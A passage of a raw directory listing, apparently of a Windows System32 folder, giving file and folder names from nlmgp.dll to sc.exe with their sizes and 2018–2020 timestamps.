09/15/2018 07:28:56 nlmgp.dll +F 29696 09/15/2018 07:28:56 nlmproxy.dll +F 17408 09/15/2018 07:28:56 nlmsprep.dll +F 89600 09/15/2018 07:28:52 nlsbres.dll +F 1565696 09/15/2018 07:29:14 NlsData0000.dll +F 6347776 09/14/2018 
17:50:00 NlsData0009.dll +F 10752 09/15/2018 07:28:52 Nlsdl.dll +F 2629120 09/14/2018 18:04:00 NlsLexicons0009.dll +F 525824 03/07/2020 00:54:16 nltest.exe +F 247296 09/15/2018 07:28:34 NmaDirect.dll +F 741 09/15/2018 07:31:36 NOISE.DAT +F 5632 09/15/2018 07:28:46 normaliz.dll +F 80078 09/15/2018 07:28:46 normidna.nls +F 50112 09/15/2018 07:28:46 normnfc.nls +F 43566 09/15/2018 07:28:46 normnfd.nls +F 71824 09/15/2018 07:28:46 normnfkc.nls +F 65698 09/15/2018 07:28:46 normnfkd.nls +F 254464 03/07/2020 00:53:45 notepad.exe +F 1319936 03/07/2020 00:53:50 NotificationController.dll +F 364544 03/07/2020 00:53:50 NotificationControllerPS.dll +F 47616 09/15/2018 07:28:36 notificationplatformcomponent.dll +F 39936 03/07/2020 00:53:45 npmproxy.dll +F 210432 03/07/2020 00:53:41 NPSM.dll +F 872960 03/07/2020 00:53:43 NPSMDesktopProvider.dll +F 18944 09/15/2018 07:28:45 nrpsrv.dll +F 44544 03/07/2020 00:54:11 nshhttp.dll +F 370688 09/15/2018 07:28:50 nshipsec.dll +F 773632 03/07/2020 00:54:15 nshwfp.dll +F 23768 03/07/2020 00:53:54 nsi.dll +F 30720 09/15/2018 07:28:45 nsisvc.dll +F 86528 03/07/2020 00:53:57 nslookup.exe +F 241680 09/15/2018 07:28:45 ntasn1.dll +F 1994768 03/07/2020 00:53:54 ntdll.dll +F 148992 09/15/2018 07:28:29 ntdsapi.dll +F 66048 03/07/2020 00:53:55 ntlanman.dll +F 20480 09/15/2018 07:28:58 ntlanui2.dll +F 39304 03/07/2020 00:53:26 NtlmShared.dll +F 185440 09/15/2018 07:28:46 ntmarta.dll +F 9672208 03/07/2020 00:53:43 ntoskrnl.exe +F 363520 09/15/2018 07:28:57 ntprint.dll +F 64000 09/15/2018 07:28:57 ntprint.exe +F 776192 03/07/2020 00:53:47 ntshrui.dll +F 18944 09/15/2018 07:28:26 ntvdm64.dll +D 0 09/15/2018 07:34:01 Nui +F 663552 03/07/2020 00:54:09 objsel.dll +F 149504 09/15/2018 07:29:18 occache.dll +F 166912 09/15/2018 07:28:43 ocsetapi.dll +F 712192 03/07/2020 00:54:15 odbc32.dll +F 73728 09/15/2018 07:29:19 odbcad32.exe +F 47616 09/15/2018 07:29:20 odbcbcp.dll +F 29696 09/15/2018 07:29:19 odbcconf.dll +F 26112 09/15/2018 07:29:19 odbcconf.exe +F 
263 09/15/2018 07:29:19 odbcconf.rsp +F 129024 09/15/2018 07:29:20 odbccp32.dll +F 86528 09/15/2018 07:29:20 odbccr32.dll +F 87040 09/15/2018 07:29:20 odbccu32.dll +F 225280 09/15/2018 07:29:19 odbcint.dll +F 165888 09/15/2018 07:29:19 odbctrac.dll +F 7680 09/15/2018 09:10:06 OEMDefaultAssociations.dll +F 5185 09/15/2018 09:10:06 OEMDefaultAssociations.xml +F 132096 09/15/2018 07:28:29 oemlicense.dll +F 87040 09/15/2018 07:28:24 ofdeploy.exe +F 269824 09/15/2018 07:28:57 offfilt.dll +F 133120 09/15/2018 07:28:24 officecsp.dll +F 131896 09/15/2018 07:28:46 offlinelsa.dll +F 252944 03/07/2020 00:53:26 offlinesam.dll +F 78848 03/07/2020 00:54:16 offreg.dll +F 45568 09/15/2018 07:28:22 oflc-nz.rs +F 423 09/15/2018 07:28:39 OkDone_80.contrast-black.png +F 438 09/15/2018 07:28:39 OkDone_80.contrast-white.png +F 423 09/15/2018 07:28:39 OkDone_80.png +F 1395056 03/07/2020 00:53:50 ole32.dll +F 421376 09/15/2018 07:28:56 oleacc.dll +F 13312 09/15/2018 07:28:56 oleacchooks.dll +F 4608 09/15/2018 07:28:56 oleaccrc.dll +F 793824 03/07/2020 00:53:26 oleaut32.dll +F 184832 03/07/2020 00:53:51 oledlg.dll +F 143872 03/07/2020 00:53:33 oleprn.dll +F 205824 09/15/2018 07:28:22 OmaDmAgent.dll +F 156712 03/07/2020 00:53:58 omadmapi.dll +F 320512 03/07/2020 00:53:58 omadmclient.exe +F 62976 09/15/2018 07:28:50 omadmprc.exe +F 47616 09/15/2018 07:28:34 OnDemandBrokerClient.dll +F 70144 09/15/2018 07:28:29 OnDemandConnRouteHelper.dll +F 359936 09/15/2018 07:28:25 OneBackupHandler.dll +F 470528 09/15/2018 07:28:22 OneCoreCommonProxyStub.dll +F 7656072 03/07/2020 00:53:37 OneCoreUAPCommonProxyStub.dll +F 660480 03/07/2020 00:53:46 OneDriveSettingSyncProvider.dll +F 237056 09/15/2018 07:28:25 onex.dll +F 1081856 09/15/2018 07:28:51 onexui.dll +D 0 03/07/2020 00:55:54 oobe +F 2179584 09/15/2018 07:28:55 OpcServices.dll +F 72704 09/15/2018 07:29:14 openfiles.exe +F 1071616 09/15/2018 07:29:21 opengl32.dll +D 0 09/15/2018 09:08:41 OpenSSH +F 120560 03/07/2020 00:53:47 OpenWith.exe +F 112128 
09/15/2018 07:29:20 OptionalFeatures.exe +F 1032544 03/07/2020 00:53:46 ortcengine.dll +F 26624 09/15/2018 07:28:45 osbaseln.dll +F 637952 09/15/2018 07:28:43 osk.exe +F 10240 09/15/2018 07:28:42 OskSupport.dll +F 9728 09/15/2018 07:28:44 osuninst.dll +F 46920 09/15/2018 07:28:22 OutdoorAudioEnvironment.bin +F 219136 03/07/2020 00:54:18 P2P.dll +F 440320 03/07/2020 00:54:18 P2PGraph.dll +F 205824 03/07/2020 00:54:18 p2pnetsh.dll +F 431616 03/07/2020 00:54:17 p2psvc.dll +F 12288 09/15/2018 07:28:46 pacjsworker.exe +F 38912 09/15/2018 07:28:38 PackagedCWALauncher.exe +F 83968 09/15/2018 09:10:00 PackageInspector.exe +F 93184 09/15/2018 07:29:14 packager.dll +F 208896 09/15/2018 07:28:30 PackageStateRoaming.dll +F 14848 09/15/2018 07:28:25 panmap.dll +F 44912 03/07/2020 00:53:53 PasswordOnWakeSettingFlyout.exe +F 19456 09/15/2018 07:29:16 PATHPING.EXE +F 65024 09/15/2018 07:29:14 pautoenr.dll +F 971776 09/15/2018 07:29:13 PayloadRestrictions.dll +F 25600 09/15/2018 07:28:34 PaymentMediatorServiceProxy.dll +F 68096 09/15/2018 07:28:42 pcacli.dll +F 64512 09/15/2018 07:28:42 pcadm.dll +F 12800 09/15/2018 07:28:42 pcaevts.dll +F 50688 09/15/2018 07:28:42 pcalua.exe +F 553784 03/07/2020 00:53:51 pcasvc.dll +F 91648 09/15/2018 07:28:42 pcaui.dll +F 157184 09/15/2018 07:28:43 pcaui.exe +F 15360 09/15/2018 07:28:22 pcbp.rs +F 150 09/15/2018 07:28:55 pcl.sep +F 918888 09/15/2018 07:28:24 PCPKsp.dll +F 29184 09/15/2018 07:28:39 PCShellCommonProxyStub.dll +F 384512 09/15/2018 07:28:29 pcsvDevice.dll +F 15872 09/15/2018 07:29:22 pcwrun.exe +F 27080 09/15/2018 07:28:46 pcwum.dll +F 126464 09/15/2018 07:29:22 pcwutl.dll +F 297984 09/15/2018 07:28:51 pdh.dll +F 56832 09/15/2018 07:29:21 pdhui.dll +F 224768 03/07/2020 00:54:24 PeerDist.dll +F 41472 09/15/2018 09:09:55 PeerDistAD.dll +F 732160 03/07/2020 00:54:24 PeerDistCacheProvider.dll +F 226304 03/07/2020 00:54:24 PeerDistCleaner.dll +F 54784 09/15/2018 09:09:55 PeerDistHttpTrans.dll +F 420864 03/07/2020 00:54:24 PeerDistSh.dll 
+F 1969152 03/07/2020 00:54:24 PeerDistSvc.dll +F 181248 03/07/2020 00:54:24 PeerDistWSDDiscoProv.dll +F 20992 09/15/2018 07:28:22 pegi-pt.rs +F 20480 09/15/2018 07:28:22 pegi.rs +F 118784 09/15/2018 07:28:34 PeopleAPIs.dll +F 214528 03/07/2020 00:53:48 PeopleBand.dll +F 116224 09/15/2018 07:29:24 PerceptionDriverClient.dll +D 0 09/15/2018 09:07:52 PerceptionSimulation +F 15872 09/15/2018 07:29:14 PerceptionSimulation.ProxyStubs.dll +F 65848 09/15/2018 07:29:24 PerceptionSimulationDevice.exe +F 557056 03/07/2020 00:54:08 PerceptionSimulationExtensions.dll +F 259072 03/07/2020 00:54:08 PerceptionSimulationManager.dll +F 125662 03/30/2020 07:49:39 perfc009.dat +F 47104 09/15/2018 07:28:51 perfctrs.dll +F 33424 09/15/2018 07:31:35 perfd009.dat +F 40960 09/15/2018 07:28:51 perfdisk.dll +F 675552 03/30/2020 07:49:39 perfh009.dat +F 297062 09/15/2018 07:31:35 perfi009.dat +F 176640 09/15/2018 07:29:21 perfmon.exe +F 145519 09/15/2018 07:29:21 perfmon.msc +F 25088 09/15/2018 07:28:51 perfnet.dll +F 40448 09/15/2018 07:28:51 perfos.dll +F 40960 03/07/2020 00:53:57 perfproc.dll +F 795992 03/30/2020 07:49:39 PerfStringBackup.INI +F 84480 09/15/2018 07:29:13 perftrack.dll +F 39936 03/07/2020 00:54:17 perfts.dll +F 90112 03/07/2020 00:53:48 PersonalizationCSP.dll +F 199680 09/15/2018 07:28:57 PersonaX.dll +F 115120 03/07/2020 00:53:53 phoneactivate.exe +F 244224 09/15/2018 07:28:34 PhoneCallHistoryApis.dll +F 420352 03/07/2020 00:53:47 PhoneDataSync.dll +F 437248 03/07/2020 00:53:40 PhoneOm.dll +F 104960 09/15/2018 07:28:39 PhonePlatformAbstraction.dll +F 846848 03/07/2020 00:53:47 PhoneProviders.dll +F 889344 03/07/2020 00:53:47 PhoneService.dll +F 2560 09/15/2018 07:28:39 PhoneServiceRes.dll +F 2259 09/15/2018 07:28:22 PhoneSystemToastIcon.contrast-white.png +F 1969 09/15/2018 07:28:22 PhoneSystemToastIcon.png +F 384000 03/07/2020 00:53:40 Phoneutil.dll +F 2560 09/15/2018 07:28:34 PhoneutilRes.dll +F 487424 03/07/2020 00:53:39 PhotoMetadataHandler.dll +F 570880 09/15/2018 
09:10:03 PhotoScreensaver.scr +F 340992 09/15/2018 09:10:04 photowiz.dll +F 121536 03/07/2020 00:53:37 PickerHost.exe +F 370176 09/15/2018 07:28:38 PickerPlatform.dll +F 46080 09/15/2018 07:29:14 pid.dll +F 1056272 03/07/2020 00:53:45 pidgenx.dll +F 35840 09/15/2018 07:28:58 pifmgr.dll +F 188416 09/15/2018 07:28:34 PimIndexMaintenance.dll +F 62464 09/15/2018 07:28:34 PimIndexMaintenanceClient.dll +F 970752 09/15/2018 07:28:34 Pimstore.dll +F 92672 09/15/2018 07:28:24 PinEnrollmentBroker.exe +F 164352 09/15/2018 07:28:24 PinEnrollmentHelper.dll +F 21504 09/15/2018 07:29:16 PING.EXE +F 776272 03/07/2020 00:53:24 pkeyhelper.dll +F 209920 09/15/2018 06:09:27 PkgMgr.exe +F 92672 03/07/2020 00:54:16 PktMon.exe +F 237056 03/07/2020 00:53:46 pku2u.dll +D 0 03/07/2020 00:55:54 pl-PL +F 1473024 09/15/2018 07:29:24 pla.dll +F 10752 09/15/2018 07:29:24 plasrv.exe +F 77824 09/15/2018 07:28:58 playlistfolder.dll +F 89088 09/15/2018 07:28:22 PlaySndSrv.dll +F 392704 09/15/2018 07:29:16 PlayToDevice.dll +F 578560 03/07/2020 00:54:09 PlayToManager.dll +F 161280 09/15/2018 07:29:14 playtomenu.dll +F 292352 09/15/2018 09:10:02 PlayToReceiver.dll +F 37376 09/15/2018 07:29:14 PlayToStatusProvider.dll +F 61456 09/15/2018 07:29:25 ploptin.dll +F 811008 09/15/2018 09:09:57 pmcsnap.dll +F 66560 09/15/2018 07:29:18 pngfilt.dll +F 2118656 03/07/2020 00:53:45 pnidui.dll +F 130048 09/15/2018 07:28:56 pnpclean.dll +F 55296 03/07/2020 00:53:44 pnppolicy.dll +F 15360 09/15/2018 07:29:23 pnpts.dll +F 41984 09/15/2018 07:28:56 pnpui.dll +F 59904 09/15/2018 07:28:55 PnPUnattend.exe +F 267776 09/15/2018 07:28:36 pnputil.exe +F 109568 09/15/2018 07:29:21 PNPXAssoc.dll +F 57344 09/15/2018 07:29:21 PNPXAssocPrx.dll +F 27136 09/15/2018 07:29:24 pnrpauto.dll +F 83456 09/15/2018 07:29:24 Pnrphc.dll +F 86016 09/15/2018 07:29:24 pnrpnsp.dll +F 356352 03/07/2020 00:54:18 pnrpsvc.dll +D 0 09/15/2018 07:33:50 PointOfService +F 542536 03/07/2020 00:53:58 policymanager.dll +F 198656 03/07/2020 00:53:43 
policymanagerprecheck.dll +F 332800 09/15/2018 07:28:50 polstore.dll +F 142848 09/15/2018 06:09:30 poqexec.exe +F 632320 09/15/2018 09:10:02 PortableDeviceApi.dll +F 126464 09/15/2018 09:10:02 PortableDeviceClassExtension.dll +F 69120 09/15/2018 09:10:02 PortableDeviceConnectApi.dll +F 438784 09/15/2018 09:09:56 PortableDeviceStatus.dll +F 158208 09/15/2018 07:29:14 PortableDeviceSyncProvider.dll +F 181760 09/15/2018 09:10:02 PortableDeviceTypes.dll +F 153600 09/15/2018 09:09:58 PortableDeviceWiaCompat.dll +F 66560 09/15/2018 07:28:36 POSyncServices.dll +F 36864 09/15/2018 07:28:42 pots.dll +F 220160 09/15/2018 07:29:21 powercfg.cpl +F 96256 09/15/2018 07:28:56 powercfg.exe +F 465920 09/15/2018 07:29:21 powercpl.dll +F 369808 09/15/2018 07:28:45 powrprof.dll +F 265216 09/15/2018 09:09:58 ppcsnap.dll +F 68608 09/15/2018 07:28:50 prauthproviders.dll +F 269824 09/15/2018 07:29:33 PresentationHost.exe +F 65536 09/15/2018 07:29:33 PresentationHostProxy.dll +F 224256 09/15/2018 09:10:00 PresentationSettings.exe +F 29184 09/15/2018 07:28:58 prevhost.exe +F 13824 09/15/2018 07:28:50 prflbmsg.dll +F 16896 09/15/2018 07:29:16 print.exe +F 81408 09/15/2018 07:28:56 Print.Workflow.Source.dll +F 72192 09/15/2018 09:10:03 PrintBrmUi.exe +F 46592 09/15/2018 07:28:25 printfilterpipelineprxy.dll +F 826880 03/07/2020 00:53:33 printfilterpipelinesvc.exe +D 0 09/15/2018 09:07:52 Printing_Admin_Scripts +F 76800 09/15/2018 07:28:25 PrintIsolationHost.exe +F 59392 09/15/2018 07:28:25 PrintIsolationProxy.dll +F 146389 09/15/2018 09:09:57 printmanagement.msc +F 68608 09/15/2018 07:28:55 PrintPlatformConfig.dll +F 727552 09/15/2018 07:28:55 PrintRenderAPIHost.DLL +F 1213440 09/15/2018 07:28:57 printui.dll +F 64000 09/15/2018 07:28:57 printui.exe +F 25600 09/15/2018 07:28:56 PrintWorkflowProxy.dll +F 177152 09/15/2018 07:28:56 PrintWorkflowService.dll +F 157184 03/07/2020 00:54:16 PrintWSDAHost.dll +F 5739008 09/14/2018 18:05:00 prm0009.dll +F 179200 09/15/2018 07:28:56 prncache.dll +F 
483840 09/15/2018 07:28:57 prnfldr.dll +F 256512 03/07/2020 00:53:45 prnntfy.dll +F 178176 03/07/2020 00:53:44 prntvpt.dll +F 35840 09/15/2018 07:28:34 ProductEnumerator.dll +F 132480 03/07/2020 00:53:54 profapi.dll +F 163840 03/07/2020 00:53:25 profext.dll +F 142336 09/15/2018 07:28:50 profprov.dll +F 470016 03/07/2020 00:53:26 profsvc.dll +F 154624 09/15/2018 07:28:51 profsvcext.dll +F 1743376 03/07/2020 00:53:25 propsys.dll +F 34304 09/15/2018 07:28:51 proquota.exe +F 799232 09/15/2018 07:28:25 provcore.dll +F 94208 03/07/2020 00:53:33 provdatastore.dll +F 21504 09/15/2018 07:28:24 provdiagnostics.dll +F 378880 03/07/2020 00:53:33 provengine.dll +F 266240 03/07/2020 00:53:33 provhandlers.dll +F 75776 09/15/2018 07:29:25 provisioningcommandscsp.dll +F 229376 03/07/2020 00:53:33 provisioningcsp.dll +F 245248 09/15/2018 07:28:24 ProvisioningHandlers.dll +F 61440 09/15/2018 07:29:25 provlaunch.exe +F 108544 09/15/2018 07:29:25 provmigrate.dll +F 290304 03/07/2020 00:53:33 provops.dll +F 138240 03/07/2020 00:53:32 provpackageapidll.dll +F 185344 09/15/2018 07:29:25 provplatformdesktop.dll +F 91136 09/15/2018 07:28:25 ProvPluginEng.dll +F 468480 03/07/2020 00:54:18 provsvc.dll +F 79360 03/07/2020 00:54:18 ProvSysprep.dll +F 315392 09/15/2018 07:28:26 provthrd.dll +F 84480 03/07/2020 00:53:33 provtool.exe +F 165376 09/15/2018 07:28:30 ProximityCommon.dll +F 16896 09/15/2018 07:28:30 ProximityCommonPal.dll +F 26112 09/15/2018 07:28:30 ProximityRtapiPal.dll +F 304640 09/15/2018 07:28:30 ProximityService.dll +F 76288 03/07/2020 00:53:37 ProximityServicePal.dll +D 0 09/15/2018 07:33:50 ProximityToast +F 259464 09/15/2018 07:29:25 ProximityUxHost.exe +F 21344 09/15/2018 07:28:26 prproc.exe +F 82944 09/15/2018 07:28:29 prvdmofcomp.dll +F 18816 09/15/2018 07:28:42 psapi.dll +F 51 09/15/2018 07:28:55 pscript.sep +F 68920 09/15/2018 07:28:46 PSHED.DLL +F 593920 09/15/2018 07:29:23 psisdecd.dll +F 98816 09/15/2018 07:29:23 psisrndr.ax +F 50176 09/15/2018 07:28:29 
PSModuleDiscoveryProvider.dll +F 4148 09/15/2018 07:28:29 psmodulediscoveryprovider.mof +F 663552 03/07/2020 00:53:42 PsmServiceExtHost.dll +F 241664 03/07/2020 00:53:42 psmsrv.dll +F 601600 09/15/2018 07:28:42 psr.exe +F 15360 09/15/2018 07:29:23 pstask.dll +F 16384 09/15/2018 07:28:50 pstorec.dll +D 0 09/15/2018 09:09:27 pt-BR +D 0 09/15/2018 09:09:27 pt-PT +F 224768 03/07/2020 00:53:28 ptpprov.dll +F 201728 09/15/2018 07:28:57 puiapi.dll +F 494080 03/07/2020 00:53:45 puiobj.dll +F 270336 09/15/2018 07:28:34 PushToInstall.dll +F 817152 09/15/2018 09:10:01 pwcreator.exe +F 327680 09/15/2018 07:29:20 pwlauncher.dll +F 35328 09/15/2018 07:29:21 pwlauncher.exe +F 93184 09/15/2018 07:29:46 pwrshplugin.dll +F 31744 09/15/2018 07:29:20 pwsso.dll +F 24576 09/15/2018 09:10:03 qappsrv.exe +F 154112 09/15/2018 07:29:14 qasf.dll +F 195072 09/15/2018 07:29:22 qcap.dll +F 250368 09/15/2018 07:29:22 qdv.dll +F 392192 09/15/2018 07:29:21 qdvd.dll +F 641536 09/15/2018 07:29:23 qedit.dll +F 733696 09/15/2018 07:29:22 qedwipes.dll +F 1388544 03/07/2020 00:53:37 qmgr.dll +F 28160 09/15/2018 09:10:03 qprocess.exe +F 1639424 09/15/2018 07:29:21 quartz.dll +F 107008 09/15/2018 07:28:32 Query.dll +F 16896 09/15/2018 09:10:03 query.exe +F 345600 03/07/2020 00:53:50 QuickActionsDataModel.dll +F 641024 09/15/2018 09:08:26 quickassist.exe +F 547840 03/07/2020 00:53:50 QuietHours.dll +F 25088 09/15/2018 09:10:03 quser.exe +F 296960 09/15/2018 07:28:56 qwave.dll +F 28672 09/15/2018 09:10:03 qwinsta.exe +F 34816 09/15/2018 07:29:21 RacEngn.dll +F 132096 09/15/2018 07:29:47 racpldlg.dll +F 99328 09/15/2018 07:29:23 radardt.dll +F 71168 09/15/2018 07:29:23 radarrs.dll +F 343552 03/07/2020 00:53:53 RADCUI.dll +D 0 09/15/2018 07:33:50 ras +F 16896 09/15/2018 07:28:57 rasadhlp.dll +F 954368 03/07/2020 00:53:45 rasapi32.dll +F 104448 09/15/2018 07:28:57 rasauto.dll +F 17920 09/15/2018 07:28:57 rasautou.exe +F 157696 09/15/2018 07:28:57 raschap.dll +F 281088 09/15/2018 07:28:57 raschapext.dll +F 1820 
09/15/2018 07:28:57 rasctrnm.h +F 21504 09/15/2018 07:28:57 rasctrs.dll +F 408064 03/07/2020 00:53:45 rascustom.dll +F 81920 09/15/2018 07:28:57 rasdiag.dll +F 19968 09/15/2018 07:28:56 rasdial.exe +F 950272 03/07/2020 00:53:45 rasdlg.dll +F 134144 09/15/2018 07:29:47 raserver.exe +F 953344 03/07/2020 00:53:45 rasgcw.dll +F 184320 03/07/2020 00:53:45 rasman.dll +F 927232 03/07/2020 00:53:45 rasmans.dll +F 61952 09/15/2018 07:28:56 rasmbmgr.dll +F 333824 03/07/2020 00:53:43 RasMediaManager.dll +F 1667072 09/15/2018 07:28:57 RASMM.dll +F 354304 09/15/2018 07:28:57 rasmontr.dll +F 35328 03/07/2020 00:53:45 rasphone.exe +F 489472 09/15/2018 07:28:57 rasplap.dll +F 305664 03/07/2020 00:53:45 rasppp.dll +F 254976 03/07/2020 00:53:45 rastapi.dll +F 521728 03/07/2020 00:53:28 rastls.dll +F 375808 09/15/2018 07:28:57 rastlsext.dll +D 0 09/15/2018 07:33:50 RasToast +F 685568 03/07/2020 00:54:18 rdbui.dll +F 1478968 03/07/2020 00:53:42 rdpbase.dll +F 11264 09/15/2018 07:29:22 rdpcfgex.dll +F 430592 03/07/2020 00:54:16 rdpclip.exe +F 1260032 03/07/2020 00:53:42 rdpcore.dll +F 1677312 03/07/2020 00:53:21 rdpcorets.dll +F 417280 03/07/2020 00:53:42 rdpencom.dll +F 304880 09/15/2018 07:29:22 rdpendp.dll +F 363520 03/07/2020 00:54:27 rdpinit.exe +F 182272 09/15/2018 07:29:22 rdpinput.exe +F 2031104 03/07/2020 00:53:21 rdpnano.dll +F 228352 09/15/2018 07:29:25 RdpRelayTransport.dll +F 43520 09/15/2018 07:29:23 RdpSa.exe +F 28160 09/15/2018 07:29:22 RdpSaProxy.exe +F 15360 09/15/2018 07:29:23 RdpSaPs.dll +F 30720 09/15/2018 07:29:23 RdpSaUacHelper.exe +F 1830712 03/07/2020 00:53:42 rdpserverbase.dll +F 464384 03/07/2020 00:54:27 rdpshell.exe +F 87552 09/15/2018 09:09:56 rdpsign.exe +F 95544 03/07/2020 00:53:21 rdpudd.dll +F 46592 09/15/2018 07:28:46 rdrleakdiag.exe +F 83968 09/15/2018 07:29:23 RDSAppXHelper.dll +F 180224 03/07/2020 00:54:16 rdsdwmdr.dll +F 59904 03/07/2020 00:54:17 RDSPnf.exe +F 109056 09/15/2018 09:10:05 RDVGHelper.exe +F 80896 09/15/2018 07:29:22 
rdvvmtransport.dll +F 658944 03/07/2020 00:54:08 RDXService.dll +F 411136 03/07/2020 00:54:18 RDXTaskFactory.dll +F 1087800 03/07/2020 00:53:35 ReAgent.dll +F 40960 09/15/2018 07:28:29 ReAgentc.exe +F 13824 09/15/2018 07:28:29 ReAgentTask.dll +F 194048 03/07/2020 00:54:18 recdisc.exe +F 13824 09/15/2018 07:29:13 recover.exe +D 0 03/29/2020 09:17:13 Recovery +F 90624 09/15/2018 07:29:22 recovery.dll +F 910336 09/15/2018 07:29:22 RecoveryDrive.exe +F 1012224 03/07/2020 00:53:51 refsutil.exe +F 74240 09/15/2018 07:29:14 reg.exe +F 105984 03/07/2020 00:53:53 regapi.dll +F 51200 09/15/2018 07:28:59 RegCtrl.dll +F 11776 09/15/2018 07:29:21 regedt32.exe +F 15872 09/15/2018 07:29:21 regidle.dll +F 46592 09/15/2018 07:29:21 regini.exe +F 24576 09/15/2018 07:28:26 Register-CimProvider.exe +F 159232 09/15/2018 07:29:16 regsvc.dll +F 24064 09/15/2018 07:29:22 regsvr32.exe +F 35112 09/15/2018 07:28:34 reguwpapi.dll +F 185344 09/15/2018 07:28:29 ReInfo.dll +F 121856 09/15/2018 07:28:50 rekeywiz.exe +F 53760 09/15/2018 07:29:20 relog.exe +F 160256 09/15/2018 07:28:29 RelPost.exe +F 94208 03/07/2020 00:53:29 RemoteAppLifetimeManager.exe +F 14336 09/15/2018 09:09:56 RemoteAppLifetimeManagerProxyStub.dll +F 88352 09/15/2018 07:28:20 remoteaudioendpoint.dll +F 208384 09/15/2018 07:29:22 remotepg.dll +F 12800 09/15/2018 07:28:36 RemotePosWorker.exe +F 104960 09/15/2018 07:29:22 remotesp.tsp +F 1613 09/15/2018 07:28:22 RemoteSystemToastIcon.contrast-white.png +F 1124 09/15/2018 07:28:22 RemoteSystemToastIcon.png +F 43008 09/15/2018 07:29:21 RemoteWipeCSP.dll +F 66560 03/07/2020 00:53:33 RemovableMediaProvisioningPlugin.dll +F 70656 09/15/2018 07:29:14 RemoveDeviceContextHandler.dll +F 14336 09/15/2018 07:29:14 RemoveDeviceElevated.dll +F 6656 09/15/2018 07:29:47 rendezvousSession.tlb +F 128000 09/15/2018 09:10:00 repair-bde.exe +F 21504 09/15/2018 07:29:16 replace.exe +F 120320 09/15/2018 07:29:14 ReportingCSP.dll +F 249112 09/15/2018 09:10:04 RESAMPLEDMO.DLL +F 17408 09/15/2018 
09:10:03 reset.exe +F 1224704 03/07/2020 00:54:16 reseteng.dll +F 2298880 03/07/2020 00:54:16 ResetEngine.dll +F 11264 09/15/2018 07:29:22 ResetEngine.exe +F 241152 03/07/2020 00:54:16 ResetEngOnline.dll +F 110592 09/15/2018 07:29:21 resmon.exe +F 489984 03/07/2020 00:54:08 ResourceMapper.dll +F 71280 09/15/2018 07:28:30 ResourcePolicyClient.dll +F 144896 09/15/2018 07:28:30 ResourcePolicyServer.dll +F 9312 09/15/2018 07:29:25 ResPriHMImageList +F 9312 09/15/2018 07:29:25 ResPriHMImageListLowCost +F 8735 09/15/2018 07:29:25 ResPriImageList +F 8735 09/15/2018 07:29:25 ResPriImageListLowCost +F 714 09/15/2018 07:28:57 RestartManager.mof +F 176 09/15/2018 07:28:57 RestartManagerUninstall.mof +F 759 09/15/2018 07:28:39 RestartNowPower_80.contrast-black.png +F 785 09/15/2018 07:28:39 RestartNowPower_80.contrast-white.png +F 759 09/15/2018 07:28:39 RestartNowPower_80.png +F 1091 03/07/2020 00:53:29 RestartTonight_80.png +F 1091 03/07/2020 00:53:29 RestartTonight_80_contrast-black.png +F 1003 03/07/2020 00:53:29 RestartTonight_80_contrast-white.png +D 0 09/15/2018 07:33:50 restore +F 622080 03/07/2020 00:54:08 resutils.dll +F 40960 03/07/2020 00:54:27 rfxvmt.dll +F 179712 09/15/2018 07:28:50 rgb9rast.dll +F 151552 09/15/2018 07:29:22 Ribbons.scr +F 607744 09/15/2018 07:28:57 riched20.dll +F 10240 09/15/2018 07:28:57 riched32.dll +F 62976 09/15/2018 07:28:25 rilproxy.dll +F 119296 03/07/2020 00:53:32 RjvMDMConfig.dll +F 574976 09/15/2018 07:28:25 RMActivate.exe +F 604160 09/15/2018 07:28:25 RMActivate_isv.exe +F 500224 09/15/2018 07:28:25 RMActivate_ssp.exe +F 500224 09/15/2018 07:28:25 RMActivate_ssp_isv.exe +F 156160 03/07/2020 00:53:45 RMapi.dll +F 152080 03/07/2020 00:53:42 rmclient.dll +F 17920 09/15/2018 07:28:57 RmClient.exe +F 102912 09/15/2018 07:28:30 RMSRoamingSecurity.dll +F 134656 09/15/2018 07:28:58 rmttpmvscmgrsvr.exe +F 2560 09/15/2018 07:29:20 rnr20.dll +D 0 09/15/2018 09:09:27 ro-RO +F 48128 09/15/2018 07:28:30 RoamingSecurity.dll +F 134656 09/15/2018 
07:29:14 Robocopy.exe +F 234440 09/15/2018 07:28:30 rometadata.dll +F 49152 09/15/2018 07:29:21 RotMgr.dll +F 24576 09/15/2018 07:29:14 ROUTE.EXE +F 80384 09/15/2018 07:28:45 RpcEpMap.dll +F 198656 09/15/2018 07:28:42 rpchttp.dll +F 10240 09/15/2018 07:28:42 RpcNs4.dll +F 32768 09/15/2018 07:28:43 rpcnsh.dll +F 30720 03/07/2020 00:53:51 RpcPing.exe +F 1180248 03/07/2020 00:53:54 rpcrt4.dll +F 62696 09/15/2018 07:28:36 RpcRtRemote.dll +F 1205248 03/07/2020 00:53:26 rpcss.dll +F 47616 09/15/2018 09:10:03 rrinstaller.exe +F 202440 09/15/2018 07:28:45 rsaenh.dll +F 133120 09/15/2018 07:29:14 rshx32.dll +F 43566 09/15/2018 09:10:05 rsop.msc +F 223744 03/07/2020 00:53:45 RstrtMgr.dll +F 269312 03/07/2020 00:54:18 rstrui.exe +F 47104 09/15/2018 07:28:57 rtffilt.dll +F 179712 09/15/2018 07:28:57 rtm.dll +F 1091936 03/07/2020 00:53:46 rtmcodecs.dll +F 485376 09/15/2018 07:28:30 RTMediaFrame.dll +F 56672 03/07/2020 00:53:46 rtmmvrortc.dll +F 1354080 03/07/2020 00:53:46 rtmpal.dll +F 4898144 03/07/2020 00:53:46 rtmpltfm.dll +F 66048 03/07/2020 00:53:45 rtutils.dll +F 169384 09/15/2018 07:28:22 RTWorkQ.dll +D 0 09/15/2018 09:09:27 ru-RU +F 96256 03/07/2020 00:53:31 RuleBasedDS.dll +F 19968 09/15/2018 07:29:23 runas.exe +F 71168 09/15/2018 07:28:57 rundll32.exe +F 57856 09/15/2018 07:28:46 runexehelper.exe +F 73216 09/15/2018 07:28:25 RunLegacyCPLElevated.exe +F 59392 09/15/2018 07:28:50 runonce.exe +F 99896 03/07/2020 00:53:37 RuntimeBroker.exe +F 23040 09/15/2018 09:10:03 rwinsta.exe +F 78848 09/15/2018 07:28:45 samcli.dll +F 122368 09/15/2018 07:28:46 samlib.dll +F 932864 03/07/2020 00:53:26 samsrv.dll +F 14848 09/15/2018 07:28:45 sas.dll +F 953344 09/15/2018 07:29:22 sbe.dll +F 195584 09/15/2018 07:29:22 sbeio.dll +F 66048 09/15/2018 07:29:23 sberes.dll +F 22528 09/15/2018 07:28:34 sbservicetrigger.dll +F 69632 09/15/2018 07:29:14 sc.exe +F 287744 